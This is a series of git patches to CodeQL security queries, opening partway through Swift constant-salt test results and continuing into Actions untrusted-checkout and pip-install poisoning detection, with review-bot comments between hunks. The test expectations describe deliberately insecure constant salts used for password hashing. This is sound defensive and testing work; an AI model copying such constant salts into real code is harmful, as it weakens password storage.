myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:69:131:69:131 | myConstantSalt2 | semmle.label | myConstantSalt2 | -| rncryptor.swift:70:106:70:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | -| rncryptor.swift:70:131:70:131 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:71:106:71:106 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:71:133:71:133 | myRandomSalt2 | semmle.label | myRandomSalt2 | -| rncryptor.swift:72:106:72:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:72:131:72:131 | myConstantSalt2 | semmle.label | myConstantSalt2 | -| rncryptor.swift:74:127:74:127 | myRandomSalt1 | semmle.label | myRandomSalt1 | -| rncryptor.swift:74:152:74:152 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:75:127:75:127 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:75:154:75:154 | myRandomSalt2 | semmle.label | myRandomSalt2 | -| rncryptor.swift:76:127:76:127 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:76:152:76:152 | myConstantSalt2 | semmle.label | myConstantSalt2 | -| rncryptor.swift:77:135:77:135 | myRandomSalt1 | semmle.label | myRandomSalt1 | -| rncryptor.swift:77:160:77:160 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:78:135:78:135 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:78:162:78:162 | myRandomSalt2 | semmle.label | myRandomSalt2 | -| rncryptor.swift:79:135:79:135 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:79:160:79:160 | myConstantSalt2 | semmle.label | myConstantSalt2 | | test.swift:29:3:29:3 | this string is constant | semmle.label | this string is constant | | test.swift:33:2:33:34 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | 
@@ -103,33 +54,15 @@ nodes | test.swift:68:53:68:53 | constantStringSalt | semmle.label | constantStringSalt | subpaths #select -| rncryptor.swift:62:57:62:57 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:62:57:62:57 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:64:55:64:55 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:64:55:64:55 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:67:106:67:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:67:106:67:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:67:131:67:131 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:67:131:67:131 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ 
| | rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:68:133:68:133 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:68:133:68:133 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:69:106:69:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:69:106:69:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:70:106:70:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:70:106:70:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:70:131:70:131 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:70:131:70:131 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. 
| rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:71:133:71:133 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:71:133:71:133 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:72:106:72:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:72:106:72:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:74:127:74:127 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:74:127:74:127 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:74:152:74:152 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:74:152:74:152 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:75:154:75:154 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ 
| rncryptor.swift:75:154:75:154 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:76:127:76:127 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:76:127:76:127 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:77:135:77:135 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:77:135:77:135 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:77:160:77:160 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:77:160:77:160 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:78:162:78:162 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:78:162:78:162 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ 
| -| rncryptor.swift:79:135:79:135 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:79:135:79:135 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | | test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | | test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | From fa43207538d25f51dd5a65cdf6262b88054f98f3 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Mon, 18 Nov 2024 09:40:06 +0000 Subject: [PATCH 0704/1267] Swift: Autoformat. --- .../lib/codeql/swift/security/CommandInjectionExtensions.qll | 3 ++- .../lib/codeql/swift/security/PredicateInjectionExtensions.qll | 3 ++- swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll | 3 ++- .../swift/security/UncontrolledFormatStringExtensions.qll | 3 ++- swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll | 3 ++- swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll | 3 ++- .../codeql/swift/security/regex/RegexInjectionExtensions.qll | 3 ++- 7 files changed, 14 insertions(+), 7 deletions(-) 
diff --git a/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll
index 55391bd3378..426fc7a664f 100644
--- a/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll
@@ -63,6 +63,7 @@ private class CommandInjectionSinks extends SinkModelCsv {
 private class CommandInjectionDefaultBarrier extends CommandInjectionBarrier {
 CommandInjectionDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() =
+ ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll
index 1ff8b97a281..2beb37c88d2 100644
--- a/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll
@@ -46,6 +46,7 @@ private class PredicateInjectionSinkCsv extends SinkModelCsv {
 private class PredicateInjectionDefaultBarrier extends PredicateInjectionBarrier {
 PredicateInjectionDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() =
+ ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll
index 0ecc24a178e..4a871496795 100644
--- a/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll
@@ -190,6 +190,7 @@ private class DefaultSqlInjectionSink extends SqlInjectionSink {
 private class SqlInjectionDefaultBarrier extends SqlInjectionBarrier {
 SqlInjectionDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() =
+ ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll
index eb44f6894b9..97c987c51b0 100644
--- a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll
@@ -94,6 +94,7 @@ class HeuristicUncontrolledFormatStringSink extends UncontrolledFormatStringSink
 private class UncontrolledFormatStringDefaultBarrier extends UncontrolledFormatStringBarrier {
 UncontrolledFormatStringDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() =
+ ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll b/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll
index 923449f4d73..9129d033409 100644
--- a/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll
@@ -127,6 +127,7 @@ private class DefaultUnsafeJsEvalSink extends UnsafeJsEvalSink {
 private class UnsafeJsEvalDefaultBarrier extends UnsafeJsEvalBarrier {
 UnsafeJsEvalDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() =
+ ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll b/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll
index 1df4a06417b..114ba813d21 100644
--- a/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll
@@ -73,6 +73,7 @@ private class UnsafeUnpackAdditionalDataFlowStep extends UnsafeUnpackAdditionalF
 private class UnsafeUnpackDefaultBarrier extends UnsafeUnpackBarrier {
 UnsafeUnpackDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() =
+ ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll
index 09c4641cbf0..eb2f3ed564b 100644
--- a/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll
@@ -64,6 +64,7 @@ private class RegexInjectionSinks extends SinkModelCsv {
 private class RegexInjectionDefaultBarrier extends RegexInjectionBarrier {
 RegexInjectionDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() =
+ ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
From 3ce3cf43bede831cf888cc9d7dec5cc38e8fb2cc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 19 Nov 2024 11:31:35 +0100
Subject: [PATCH 0705/1267] refactor common code to identify untrusted checkouts
---
 .../codeql/actions/dataflow/FlowSources.qll | 47 +------------------
 .../security/ArtifactPoisoningQuery.qll | 15 +++---
 .../security/OutputClobberingQuery.qll | 21 +--------
 .../security/UntrustedCheckoutQuery.qll | 25 ++++++++++
 4 files changed, 37 insertions(+), 71 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 2fca425642e..cf1763b1c03 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -92,28 +92,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource {
 GitCommandSource() {
 exists(Step checkout, string cmd_regex |
- // This should be:
- // source instanceof PRHeadCheckoutStep
- // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error
- // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround
- // instead of using ActionsMutableRefCheckout and ActionsSHACheckout
- (
- exists(Uses uses |
- checkout = uses and
- uses.getCallee() = "actions/checkout" and
- exists(uses.getArgument("ref")) and
- not uses.getArgument("ref").matches("%base%") and
- uses.getATriggerEvent().getName() = checkoutTriggers()
- )
- or
- checkout instanceof GitMutableRefCheckout
- or
- checkout instanceof GitSHACheckout
- or
- checkout instanceof GhMutableRefCheckout
- or
- checkout instanceof GhSHACheckout
- ) and
+ checkout instanceof SimplePRHeadCheckoutStep and
 this.asExpr() = run.getScript() and
 checkout.getAFollowingStep() = run and
 run.getScript().getAStmt() = cmd and
@@ -255,29 +234,7 @@ class ArtifactSource extends RemoteFlowSource, FileSource {
 private class CheckoutSource extends RemoteFlowSource, FileSource {
 Event event;
- CheckoutSource() {
- // This should be:
- // source instanceof PRHeadCheckoutStep
- // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error
- // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround
- // instead of using ActionsMutableRefCheckout and ActionsSHACheckout
- exists(Uses uses |
- this.asExpr() = uses and
- uses.getCallee() = "actions/checkout" and
- exists(uses.getArgument("ref")) and
- not uses.getArgument("ref").matches("%base%") and
- event = uses.getATriggerEvent() and
- event.getName() = checkoutTriggers()
- )
- or
- this.asExpr() instanceof GitMutableRefCheckout
- or
- this.asExpr() instanceof GitSHACheckout
- or
- this.asExpr() instanceof GhMutableRefCheckout
- or
- this.asExpr() instanceof GhSHACheckout
- }
+ CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep }
 override string getSourceType() { result = "artifact" }
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
index 31427287b0c..d8d5f83c867 100644
--- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
+++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
@@ -3,6 +3,7 @@ private import codeql.actions.TaintTracking
 import codeql.actions.DataFlow
 import codeql.actions.dataflow.FlowSources
 import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.UntrustedCheckoutQuery
 string unzipRegexp() { result = "(unzip|tar)\\s+.*" }
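Review bot: The `Event event;` field kept as context in `CheckoutSource` is no longer constrained by anything in the new one-line characteristic predicate; the removed body bound it with `event = uses.getATriggerEvent()`, and only in its `actions/checkout` branch. Unless a member outside this hunk still binds it, the field now ranges over every `Event` for each checkout source, which multiplies the class's tuples and loses the link between the source and the trigger that makes it attacker-reachable. Either drop the field or bind it in the predicate, e.g. `CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep and event = this.asExpr().(Step).getATriggerEvent() }`. The class body continues past the hunk, so how `event` is consumed there needs checking.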
@@ -22,11 +23,10 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us
 exists(this.getArgument("github-token"))
 or
 // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step
- exists(LocalJob job, UsesStep checkout, UsesStep upload |
+ exists(LocalJob job, SimplePRHeadCheckoutStep checkout, UsesStep upload |
 this.getEnclosingWorkflow().getAJob() = job and
 job.getAStep() = checkout and
- job.getATriggerEvent().getName() = "pull_request_target" and
- checkout.getCallee() = "actions/checkout" and
+ checkout.getATriggerEvent().getName() = "pull_request_target" and
 checkout.getAFollowingStep() = upload and
 upload.getCallee() = "actions/upload-artifact"
 )
@@ -55,8 +55,10 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep
 "ma-ve/action-download-artifact-with-retry"
 ] and
 (
- not exists(this.getArgument(["branch", "branch_name"])) or
- not this.getArgument(["branch", "branch_name"]) = ["main", "master"]
+ not exists(this.getArgument(["branch", "branch_name"]))
+ or
+ exists(this.getArgument(["branch", "branch_name"])) and
+ this.getArgument("allow_forks") = "true"
 ) and
 (
 not exists(this.getArgument(["commit", "commitHash", "commit_sha"])) or
@@ -74,7 +76,8 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep
 ) and
 (
 not exists(this.getArgument("pr")) or
- not this.getArgument("pr").matches("%github.event.pull_request.number%")
+ not this.getArgument("pr")
+ .matches(["%github.event.pull_request.number%", "%github.event.number%"])
 )
 }
diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
index e6cc0d06a46..1d0de83afa3 100644
--- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
+++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
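Review bot: The `branch`/`branch_name` condition in the `@@ -55,8 +55,10 @@` hunk changes what the query reports, which goes beyond the refactor named in the commit subject. The old line flagged any download whose branch was not `main` or `master`; the new one flags a download with a branch set only when `allow_forks` is literally `"true"`, so a step that names a branch and leaves `allow_forks` unset is now treated as trusted. That holds only if every action modelled by this class defaults `allow_forks` to false in the versions being scanned, which the hunk does not show, so please confirm it and record the assumption next to the check, e.g. `// a named branch is trusted unless fork runs are explicitly allowed (assumes allow_forks defaults to false)`. The commit's diffstat lists no test file, so a workflow fixture with a branch and no `allow_forks` would pin the intended result; the characteristic predicate starts and ends outside the hunk.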
@@ -20,26 +20,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink {
 (
 step instanceof UntrustedArtifactDownloadStep
 or
- // This should be:
- // artifact instanceof PRHeadCheckoutStep
- // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error
- // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround
- // instead of using ActionsMutableRefCheckout and ActionsSHACheckout
- exists(Uses uses |
- step = uses and
- uses.getCallee() = "actions/checkout" and
- exists(uses.getArgument("ref")) and
- not uses.getArgument("ref").matches("%base%") and
- uses.getATriggerEvent().getName() = checkoutTriggers()
- )
- or
- step instanceof GitMutableRefCheckout
- or
- step instanceof GitSHACheckout
- or
- step instanceof GhMutableRefCheckout
- or
- step instanceof GhSHACheckout
+ step instanceof SimplePRHeadCheckoutStep
 ) and
 step.getAFollowingStep() = run and
 this.asExpr() = run.getScript() and
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index 9653ae2beda..1a75f8a96c1 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
@@ -193,6 +193,31 @@ predicate containsHeadRef(string s) {
 )
 }
+class SimplePRHeadCheckoutStep extends Step {
+ SimplePRHeadCheckoutStep() {
+ // This should be:
+ // artifact instanceof PRHeadCheckoutStep
+ // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error
+ // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround
+ // instead of using ActionsMutableRefCheckout and ActionsSHACheckout
+ exists(Uses uses |
+ this = uses and
+ uses.getCallee() = "actions/checkout" and
+ exists(uses.getArgument("ref")) and
+ not uses.getArgument("ref").matches("%base%") and
+ uses.getATriggerEvent().getName() = checkoutTriggers()
+ )
+ or
+ this instanceof GitMutableRefCheckout
+ or
+ this instanceof GitSHACheckout
+ or
+ this instanceof GhMutableRefCheckout
+ or
+ this instanceof GhSHACheckout
+ }
+}
+
 /** Checkout of a Pull Request HEAD */
 abstract class PRHeadCheckoutStep extends Step {
 abstract string getPath();
From afb7967a0cde8e0018678cc2c5453515828f36d1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 19 Nov 2024 11:31:59 +0100
Subject: [PATCH 0706/1267] Delete .actual test files
---
 .../CodeQL/UnnecessaryUseOfAdvancedConfig.actual | 1 -
 1 file changed, 1 deletion(-)
 delete mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual
deleted file mode 100644
index 3c8904a86af..00000000000
--- a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual
+++ /dev/null
@@ -1 +0,0 @@
-| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. |
From 082b4c3ca2c28032e28361dd9eda4351cafed333 Mon Sep 17 00:00:00 2001
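Review bot: The new `SimplePRHeadCheckoutStep` class in the `@@ -193,6 +193,31 @@` hunk is public but has no QLDoc, and the comment moved into it still reads `artifact instanceof PRHeadCheckoutStep` from its previous location. Three libraries in this commit now rely on the class to decide what counts as an untrusted checkout, so I would add `/** A step that checks out pull-request HEAD code, recognised syntactically (no taint tracking) so flow sources can use it without recursion. */` above it, matching the QLDoc on `PRHeadCheckoutStep` just below. The inner comment should say `this instanceof PRHeadCheckoutStep` and have its typos fixed (`and`, `non-monotonic recursion`). It is also worth one line noting that the `actions/checkout` branch treats any `ref` whose text contains `base` as safe, since that substring rule decides whether a checkout is reported at all.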
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 20 Nov 2024 15:35:49 +0100
Subject: [PATCH 0707/1267] Add poisonable step for pip install .
---
 ql/lib/ext/config/poisonable_steps.yml | 6 +--
 .../CWE-094/.github/workflows/test27.yml | 52 +++++++++++++++++++
 .../CWE-094/CodeInjectionCritical.expected | 12 +++++
 .../CWE-094/CodeInjectionMedium.expected | 11 ++++
 .../CWE-829/.github/workflows/test7.yml | 1 +
 .../UntrustedCheckoutCritical.expected | 6 ++-
 6 files changed, 83 insertions(+), 5 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml
index 2f03b94b402..87ed8eec76f 100644
--- a/ql/lib/ext/config/poisonable_steps.yml
+++ b/ql/lib/ext/config/poisonable_steps.yml
@@ -41,9 +41,9 @@ extensions:
 - ["pre-commit"]
 - ["prettier"]
 - ["phpstan"]
- - ["pip\\s+install\\s+-r"]
- - ["pip\\s+install\\s+--requirement"]
- - ["pipx\\s+install\\s+\\."]
+ - ["pip\\s+install(.*)\\s+-r"]
+ - ["pip\\s+install(.*)\\s+--requirement"]
+ - ["pip(x)?\\s+install(.*)\\s+\\."]
 - ["poetry"]
 - ["pylint"]
 - ["pytest"]
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml
new file mode 100644
index 00000000000..e9ba77c0f93
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml
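Review bot: The three widened patterns still key on the literal command name `pip`, so `pip3 install .` or `pip3 install -r requirements.txt` run after an untrusted checkout would not be recognised as poisonable by these entries; `pip(x|3)?\\s+install(.*)\\s+\\.` and the same prefix on the `-r` and `--requirement` lines would cover that spelling. Separately, `(.*)\\s+\\.` is greedy and has no end anchor, so if the pattern is applied to a whole command line it would also match a dot argument belonging to a later command, as in `pip install requests && ls .`, which is a false positive and not a miss. How these strings are matched is not visible in this hunk, so both points need checking against the predicate that consumes the list, which continues outside the hunk. A fixture step using `pip3` next to the new `pip install --no-deps .` case would settle the first point.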
